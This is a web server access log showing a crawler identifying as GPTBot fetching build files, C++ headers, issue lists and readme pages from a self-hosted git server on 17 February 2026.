"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:18:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11593] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:18:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11275] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:18:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 18545] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12375] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12773] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp?display=source" [Client 74.7.227.38] [Length 12767] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" +[17/Feb/2026:18:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12273] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12778] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12774] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12376] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12773] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12865] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12377] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12790] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12774] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12863] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11341] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" +[17/Feb/2026:18:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13196] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2fReadMe.md" [Client 74.7.227.38] [Length 23924] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:18:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12505] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:18:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:18:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:18:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:18:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11153] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 